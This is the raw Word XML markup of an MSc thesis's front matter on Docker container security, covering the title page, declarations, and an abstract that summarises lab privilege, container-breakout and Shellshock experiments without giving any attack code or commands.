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80EE5" w14:textId="1CF801EA" w:rsidR="00B669F0" w:rsidRDefault="00100AC7" w:rsidP="00100AC7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0087446F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F5B846D" wp14:editId="64F4277B">
            <wp:extent cx="3114281" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 1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0938" cy="1250442"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="716E2634" w14:textId="77777777" w:rsidR="00490073" w:rsidRDefault="00490073" w:rsidP="00100AC7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CCDA041" w14:textId="1F1DCBF5" w:rsidR="00BD5D1A" w:rsidRPr="00490073" w:rsidRDefault="00100AC7" w:rsidP="00100AC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Examining Docker Containers Security </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A25018" w14:textId="286F4C1E" w:rsidR="00100AC7" w:rsidRPr="00490073" w:rsidRDefault="00100AC7" w:rsidP="00100AC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B1CD1E" w14:textId="4E16E658" w:rsidR="00F9587B" w:rsidRPr="00490073" w:rsidRDefault="00100AC7" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Yohannes Zerzghi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E926D61" w14:textId="68008009" w:rsidR="00100AC7" w:rsidRPr="00490073" w:rsidRDefault="00100AC7" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Supervisor: Dr Carlene E-A Campbell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA870FF" w14:textId="69C1A5F5" w:rsidR="00100AC7" w:rsidRDefault="00F9587B" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00100AC7" w:rsidRPr="00490073">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Second Marker: Dr Nitheesh Kaliyamurthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD726C" w14:textId="77777777" w:rsidR="00490073" w:rsidRPr="00490073" w:rsidRDefault="00490073" w:rsidP="00100AC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EBD2004" w14:textId="7F0BA0D6" w:rsidR="00490073" w:rsidRDefault="00490073" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Project submitted as part of the requirements for the award of MSc Computer Networks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Cybers</w:t>
      </w:r>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2630F8" w14:textId="77777777" w:rsidR="00F9587B" w:rsidRPr="00490073" w:rsidRDefault="00F9587B" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45FBE39E" w14:textId="11A56643" w:rsidR="00490073" w:rsidRPr="00F9587B" w:rsidRDefault="00490073" w:rsidP="00100AC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9587B">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Nov 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797F5628" w14:textId="5526371E" w:rsidR="00100AC7" w:rsidRDefault="00100AC7" w:rsidP="00B669F0"/>
    <w:p w14:paraId="361D4DD2" w14:textId="1D3F358D" w:rsidR="005C7C0D" w:rsidRDefault="005C7C0D" w:rsidP="00B669F0"/>
    <w:p w14:paraId="1CF627E9" w14:textId="77777777" w:rsidR="005C7C0D" w:rsidRDefault="005C7C0D" w:rsidP="00B669F0"/>
    <w:p w14:paraId="552D3F2E" w14:textId="6EA925F2" w:rsidR="00100AC7" w:rsidRDefault="00F9587B" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9587B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Declaration of originality </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21B87C" w14:textId="77777777" w:rsidR="00ED71DE" w:rsidRDefault="00ED71DE" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D18E00" w14:textId="7E7BCAE6" w:rsidR="00F9587B" w:rsidRDefault="00F9587B" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I am </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Yohannes Zerzghi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, I declare that I am the sole author of this project; that all references cited have been consulted; that I have conducted all work of which this is a record, and that the finished work lies within the prescribed word limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E23C992" w14:textId="0D66729D" w:rsidR="00F9587B" w:rsidRDefault="00F9587B" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This work has not previously been accepted as part of any other degree submission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E47A363" w14:textId="73F86DD7" w:rsidR="00F9587B" w:rsidRDefault="00F9587B" w:rsidP="00030C2F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030C2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Signed: Yohannes Zerzghi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78227DD8" w14:textId="77777777" w:rsidR="00030C2F" w:rsidRPr="00030C2F" w:rsidRDefault="00030C2F" w:rsidP="00030C2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC4B09F" w14:textId="11E73CCC" w:rsidR="00F9587B" w:rsidRDefault="00030C2F" w:rsidP="00030C2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                            </w:t>
      </w:r>
      <w:r w:rsidR="00F9587B" w:rsidRPr="00030C2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Date: 12/11/2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F142729" w14:textId="77777777" w:rsidR="00ED71DE" w:rsidRDefault="00ED71DE" w:rsidP="00030C2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A178DEE" w14:textId="77777777" w:rsidR="00030C2F" w:rsidRPr="00030C2F" w:rsidRDefault="00030C2F" w:rsidP="00030C2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB9ED5D" w14:textId="04ACB450" w:rsidR="00F9587B" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030C2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">FORM OF CONSENT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708E1429" w14:textId="77777777" w:rsidR="00030C2F" w:rsidRPr="00030C2F" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E26CE21" w14:textId="5ADDF5D2" w:rsidR="00F9587B" w:rsidRPr="00ED71DE" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I am </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Yohannes Zerzghi</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, hereby that my project, submitted in candidature for the MCs Computer Networks and Cybersecurity degree, if successful, may be made available for inter-library loan or photocopying (subject to the law of copyright) and that the title abstract may be made available to outside organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B459DCD" w14:textId="5E42C127" w:rsidR="00030C2F" w:rsidRPr="00ED71DE" w:rsidRDefault="00030C2F" w:rsidP="00ED71DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signed: Yohannes Zerzghi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8CE68" w14:textId="77777777" w:rsidR="00030C2F" w:rsidRDefault="00030C2F" w:rsidP="00B669F0"/>
    <w:p w14:paraId="5BFEB6C2" w14:textId="29110984" w:rsidR="00030C2F" w:rsidRPr="00ED71DE" w:rsidRDefault="00030C2F" w:rsidP="00ED71DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Date: 12/11/2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6C47A" w14:textId="77777777" w:rsidR="00ED71DE" w:rsidRDefault="00ED71DE" w:rsidP="00B669F0"/>
    <w:p w14:paraId="5D4E4051" w14:textId="52D1CA9C" w:rsidR="00030C2F" w:rsidRPr="00F43EC2" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Copyright Acknowledgement </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D56E3E" w14:textId="0BACBEC9" w:rsidR="00030C2F" w:rsidRPr="00ED71DE" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I acknowledge that the copyright of this project report, and any product developed as part of the project, belong to the University of Wales Trinity Saint David, Swansea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE19CD" w14:textId="5556A1E8" w:rsidR="00ED71DE" w:rsidRDefault="00ED71DE" w:rsidP="00B669F0"/>
    <w:p w14:paraId="778E15F2" w14:textId="77777777" w:rsidR="00F43EC2" w:rsidRDefault="00F43EC2" w:rsidP="00B669F0"/>
    <w:p w14:paraId="55364E9C" w14:textId="462B963B" w:rsidR="00B669F0" w:rsidRDefault="00ED71DE" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ABSTRACT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F21CA" w14:textId="591CD7F4" w:rsidR="00480C4E" w:rsidRDefault="00480C4E" w:rsidP="00B669F0">
      <w:r>
        <w:t xml:space="preserve">In recent years, Docker has become a prominent virtualisation tool for deploying applications in cloud </w:t>
      </w:r>
      <w:r w:rsidR="00E947D6">
        <w:t xml:space="preserve">computing architectures due to its agility, flexibility, reliability, scalability, and many other benefits. As a result, its popularity is gaining momentum </w:t>
      </w:r>
      <w:r w:rsidR="00106F1E">
        <w:t>in the containerisation industry and cloud users, specifically within developers and DevOps.</w:t>
      </w:r>
      <w:r w:rsidR="00441EDA">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="0046175F">
        <w:t>its security platform is not mature yet and creat</w:t>
      </w:r>
      <w:r w:rsidR="00E61FE9">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="0046175F">
        <w:t xml:space="preserve"> a big concern among its users and cloud practitioners. One of its main security issues is</w:t>
      </w:r>
      <w:r w:rsidR="00E61FE9">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="0046175F">
        <w:t xml:space="preserve"> Docker does not provide more splendid isolation between the host and </w:t>
      </w:r>
      <w:r w:rsidR="00C77540">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="00E61FE9">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00C77540">
        <w:t>between themselves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42959477" w14:textId="7C967F49" w:rsidR="00CE18CB" w:rsidRDefault="00451240" w:rsidP="00B669F0">
      <w:r>
        <w:t>In this thesis,</w:t>
      </w:r>
      <w:r w:rsidR="00A24617">
        <w:t xml:space="preserve"> we are </w:t>
      </w:r>
      <w:r w:rsidR="00626C55">
        <w:t xml:space="preserve">engaged to </w:t>
      </w:r>
      <w:r w:rsidR="00DD1343">
        <w:t xml:space="preserve">examine Docker containers security using three different </w:t>
      </w:r>
      <w:r w:rsidR="00CC310C">
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidR="00786F23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00965A53">
        <w:t xml:space="preserve">to evaluate and test its current security </w:t>
      </w:r>
      <w:r w:rsidR="00AE4E84">
        <w:t>system.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EF2">
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="00F8248F">
        <w:t xml:space="preserve"> pragmatic approach is </w:t>
      </w:r>
      <w:r w:rsidR="00F24A48">
        <w:t xml:space="preserve">developed </w:t>
      </w:r>
      <w:r w:rsidR="00FB6395">
        <w:t xml:space="preserve">established </w:t>
      </w:r>
      <w:r w:rsidR="00AA6372">
        <w:t>upon</w:t>
      </w:r>
      <w:r w:rsidR="009A0C88">
        <w:t xml:space="preserve"> a comprehe</w:t>
      </w:r>
      <w:r w:rsidR="00E1254D">
        <w:t>nsive background research and literature review</w:t>
      </w:r>
      <w:r w:rsidR="00DD5205">
        <w:t xml:space="preserve"> aiming</w:t>
      </w:r>
      <w:r w:rsidR="0007629E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A86A7B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00E46F82">
        <w:t>carry out the security attacks</w:t>
      </w:r>
      <w:r w:rsidR="008B5953">
        <w:t xml:space="preserve"> in a methodo</w:t>
      </w:r>
      <w:r w:rsidR="00386755">
        <w:t>logical way</w:t>
      </w:r>
      <w:r w:rsidR="00E46F82">
        <w:t xml:space="preserve"> on a Docker </w:t>
      </w:r>
      <w:r w:rsidR="00244ED8">
        <w:t xml:space="preserve">platform </w:t>
      </w:r>
      <w:r w:rsidR="00E46F82">
        <w:t xml:space="preserve">hosted on a single Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="008E1352">
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidR="00E76A74">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B2653" w14:textId="698B24AF" w:rsidR="00DC2C1D" w:rsidRDefault="00400C0A" w:rsidP="00B669F0">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D6587C">
        <w:t>his report</w:t>
      </w:r>
      <w:r w:rsidR="00FC2460">
        <w:t xml:space="preserve"> has</w:t>
      </w:r>
      <w:r w:rsidR="00D6587C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E21974">
        <w:t xml:space="preserve">conducted </w:t>
      </w:r>
      <w:r w:rsidR="00036EE6">
        <w:t xml:space="preserve">three Docker security attacks: privilege, </w:t>
      </w:r>
      <w:r w:rsidR="008B0D71">
        <w:t>containers breakout</w:t>
      </w:r>
      <w:r w:rsidR="00B459B5">
        <w:t>, and using vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="00844641">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C5C15">
        <w:t xml:space="preserve"> The first two attacks </w:t>
      </w:r>
      <w:r w:rsidR="00A97AF4">
        <w:t xml:space="preserve">use scripts </w:t>
      </w:r>
      <w:r w:rsidR="00ED2822">
        <w:t>written in Dockerfile to</w:t>
      </w:r>
      <w:r w:rsidR="00157F8A">
        <w:t xml:space="preserve"> examine and </w:t>
      </w:r>
      <w:r w:rsidR="00DA451E">
        <w:t>undertake the</w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t xml:space="preserve"> security attacks</w:t>
      </w:r>
      <w:r w:rsidR="00FC2460">
        <w:t>. In contrast,</w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t xml:space="preserve"> the last one </w:t>
      </w:r>
      <w:r w:rsidR="00212B57">
        <w:t>uses</w:t>
      </w:r>
      <w:r w:rsidR="003A2C4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="003A2C4D">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="003A2C4D">
        <w:t xml:space="preserve"> vulnerable to</w:t>
      </w:r>
      <w:r w:rsidR="006F3567">
        <w:t xml:space="preserve"> shellshock</w:t>
      </w:r>
      <w:r w:rsidR="00956B9F">
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t xml:space="preserve"> downloaded </w:t>
      </w:r>
      <w:r w:rsidR="001E5001">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="00D246ED">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="001E5001">
        <w:t>Docker Hub to impersonate</w:t>
      </w:r>
      <w:r w:rsidR="00333683">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E06BC">
        <w:t>on how attackers can infiltrate through vulnerable application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47007D97" w14:textId="147389A2" w:rsidR="002D2D8A" w:rsidRDefault="002D2D8A" w:rsidP="00B669F0">
      <w:r>
        <w:t xml:space="preserve">The results </w:t>
      </w:r>
      <w:r w:rsidR="00822234">
        <w:t>of the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00AE6C80">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00822234">
        <w:t xml:space="preserve"> show</w:t>
      </w:r>
      <w:r w:rsidR="00123A24">
        <w:t xml:space="preserve"> that Docker security is far from perfect, </w:t>
      </w:r>
      <w:r w:rsidR="00704EDA">
        <w:t>mainly</w:t>
      </w:r>
      <w:r w:rsidR="00822FC5">
        <w:t xml:space="preserve"> working with privileged us</w:t>
      </w:r>
      <w:r w:rsidR="00005D7A">
        <w:t>ers</w:t>
      </w:r>
      <w:r w:rsidR="00D90AAC">
        <w:t xml:space="preserve">. For this reason, </w:t>
      </w:r>
      <w:r w:rsidR="00981284">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00A74C02">
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidR="00D63BF8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00A74C02">
        <w:t xml:space="preserve">strong </w:t>
      </w:r>
      <w:r w:rsidR="00EC135E">
        <w:t>recommendation regarding</w:t>
      </w:r>
      <w:r w:rsidR="00143AF5">
        <w:t xml:space="preserve"> the consequence </w:t>
      </w:r>
      <w:r w:rsidR="00D12BA5">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00915C3E">
        <w:t>running containers with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="0016568C">
        <w:t xml:space="preserve"> as this allows </w:t>
      </w:r>
      <w:r w:rsidR="001B534B">
        <w:t>to malicious users escape</w:t>
      </w:r>
      <w:r w:rsidR="00F24DC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F72CE6">
        <w:t xml:space="preserve">their privilege </w:t>
      </w:r>
      <w:r w:rsidR="00F24DC6">
        <w:t>easily</w:t>
      </w:r>
      <w:r w:rsidR="001B534B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F72CE6">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00597D4C">
        <w:t xml:space="preserve">perform </w:t>
      </w:r>
      <w:r w:rsidR="00F24DC6">
        <w:t>malicious act</w:t>
      </w:r>
      <w:r w:rsidR="00F72CE6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F24DC6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3754EC22" w14:textId="1F98FBF5" w:rsidR="007D40E1" w:rsidRDefault="00B116BA" w:rsidP="00B669F0">
      <w:r w:rsidRPr="007433C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keywords</w:t>
      </w:r>
      <w:r w:rsidR="007433C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007B43BC">
        <w:t xml:space="preserve">Docker, </w:t>
      </w:r>
      <w:r w:rsidR="00777FDB">
        <w:t xml:space="preserve">virtualisation, containerisation, </w:t>
      </w:r>
      <w:r w:rsidR="00291E7C">
        <w:t>namespaces, Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="0072729E">
        <w:t>, containers, images,</w:t>
      </w:r>
      <w:r w:rsidR="00EE5746">
        <w:t xml:space="preserve"> isolation, privilege</w:t>
      </w:r>
      <w:r w:rsidR="007D40E1">
        <w:t>, container breakout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F73D1C3" w14:textId="796605FB" w:rsidR="00B116BA" w:rsidRDefault="008E37E5" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E37E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Acknowledgements</w:t>
      </w:r>
      <w:r w:rsidR="00777FDB" w:rsidRPr="008E37E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C99DB2D" w14:textId="1FCE2C72" w:rsidR="00B669F0" w:rsidRDefault="001441C9" w:rsidP="00B669F0">
      <w:r>
        <w:t xml:space="preserve">I would like to thank </w:t>
      </w:r>
      <w:r w:rsidR="00743D14">
        <w:t xml:space="preserve">my esteemed supervisor </w:t>
      </w:r>
      <w:r w:rsidR="00743D14" w:rsidRPr="00102C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dr</w:t>
      </w:r>
      <w:r w:rsidR="00B043D3" w:rsidRPr="00102C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Carlene Campbell</w:t>
      </w:r>
      <w:r w:rsidR="00B043D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00882304">
        <w:t>for her invaluable supervision</w:t>
      </w:r>
      <w:r w:rsidR="002042C9">
        <w:t>, advice</w:t>
      </w:r>
      <w:r w:rsidR="003B53A7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007A4915">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002042C9">
        <w:t>and support</w:t>
      </w:r>
